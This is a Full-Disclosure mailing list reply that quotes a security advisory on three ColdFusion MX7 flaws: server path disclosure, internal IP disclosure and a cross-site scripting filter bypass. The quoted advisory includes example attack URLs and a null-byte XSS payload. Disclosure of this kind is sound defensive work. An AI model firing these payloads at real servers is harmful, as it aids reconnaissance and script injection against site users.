[<prev] [next>] [day] [month] [year] [list]
Message-ID: <26563eca0612120633o3cc9345fp6c7b1d9450bf46af@mail.gmail.com>
Date: Tue, 12 Dec 2006 09:33:35 -0500
From: "Darren Bounds" <dbounds@...il.com>
To: "Brett Moore" <brett.moore@...urity-assessment.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [SBDA] - ColdFusion MX7 - Multiple
Vulnerabilities
Brett,
With regard to the first item, you realize that this item is
completely mitigated when a global error handler is defined, correct?
Without a global error handler, there's a hell of a lot more
information than that what you've mentioned available for the picking.
This is very well documented.
Darren
On 12/10/06, Brett Moore <brett.moore@...urity-assessment.com> wrote:
> Just clearing stuff out before Christmas.
>
> ========================================================================
> = ColdFusion MX7 - Multiple Vulnerabilities
> =
> = Vendor Website:
> = http://www.Adobe.com
> =
> = Affected Software:
> = ColdFusion MX7 (and possibly MX6)
> =
> = Public disclosure on Monday December 11, 2006
> ========================================================================
>
> == Overview ==
>
> This advisory discloses three separate security issues in ColdFusion
> MX7.
>
> * Server Path Disclosure *
>
> It is possible to cause the server to disclose the local path by making
> an invalid request. This information could be used to aide in other file
> or path based attacks.
>
> The request must be for an existing file, that has an extension not
> handled by the web server. (ie: not asp,aspx).
>
> The request must be terminated with either of the following;
> /.jws
> /.cfm
> /.cfml
> /.cfc
>
> Some example requests are;
> http://serverip/page1.htm/a.cfm
> http://serverip/CFIDE/administrator/analyzer/img/minus.gif/a.cfm
> http://serverip/jrunscripts/jrun.ini/a.cfm
> http://serverip/jrunscripts/jrunserver.store/a.cfm
> http://serverip/jrunscripts/readme.txt/a.cfm
>
> This has been confirmed against installs that do NOT have debugging or
> robust exception information turned on.
>
> Sending a request in this format returns a message similar to;
> Error parsing the Tag Library Descriptor
> file:/d:/sekretpath/hidden/page1.htm/..
>
> * Internal IP Address Disclosure *
>
> It is possible to cause the server to disclose the internal network IP
> address of the host. This information could be used to aide in other
> network based attacks.
>
> Making a request to the /CFIDE/administrator/login.cfm page WITHOUT
> supplying a host, will result in the internal IP address of the
> server to be disclosed as part of an href tag.
>
> ------------------------------------------------------------------
> GET /CFIDE/administrator/login.cfm HTTP/1.0
>
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.1
> Date: Thu, 09 Nov 2006 05:44:02 GMT
>
> <html>
> <head>
> <LINK REL="SHORTCUT ICON"
> href="http://INTERNALADDRESS:80/CFIDE/administrator/favicon.ico">
>
> ------------------------------------------------------------------
>
> * Cross Site Scripting Protection Bypass *
>
> ColdFusion MX7 appears to have built in protection against cross
> site scripting attacks, and will replace <script> tags with
> <invalid tag>.
>
> Example URL that is converted to a 'safe' format;
>
> http://server/CFIDE/componentutils/cfcexplorer.cfc?
> method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&
> path=/cfide/adminapi/administrator.cfctest">
> <script>alert()</script>
>
> By inserting a %00 within the <script> tag, it is possible to still
> conduct cross site scripting attacks against users of
> Internet Explorer.
>
> Example URL that will have script executed;
>
> http://server/CFIDE/componentutils/cfcexplorer.cfc?
> method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&
> path=/cfide/adminapi/administrator.cfctest">
> <%00script>alert(document.domain)</script>
>
> == Solutions ==
>
> Currently, the issues outlined in the report are being considered for
> the next major version of ColdFusion - the release date is currently not
>
> finalized. There is currently no plan to release security bulletins for
> any of the issues from the report
>
> == Credit ==
>
> Discovered and advised to Adobe November 11, 2006 by Brett Moore of
> Security-Assessment.com
>
> == About Security-Assessment.com ==
>
> Security-Assessment.com is Australasia's leading team of Information
> Security consultants specialising in providing high quality Information
> Security services to clients throughout the Asia Pacific region. Our
> clients include some of the largest globally recognised companies in
> areas such as finance, telecommunications, broadcasting, legal and
> government. Our aim is to provide the very best independent advice and
> a high level of technical expertise while creating long and lasting
> professional relationships with our clients.
>
> Security-Assessment.com is committed to security research and
> development, and its team continues to identify and responsibly publish
> vulnerabilities in public and private software vendor's products.
> Members of the Security-Assessment.com R&D team are globally recognised
> through their release of whitepapers and presentations related to new
> security research.
>
> Security-Assessment.com is an Endorsed Commonwealth Government of
> Australia supplier and sits on the Australian Government
> Attorney-General's Department Critical Infrastructure Project panel.
> We are certified by both Visa and MasterCard under their Payment
> Card Industry Data Security Standard Programs.
>
--
Thank you,
Darren Bounds
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists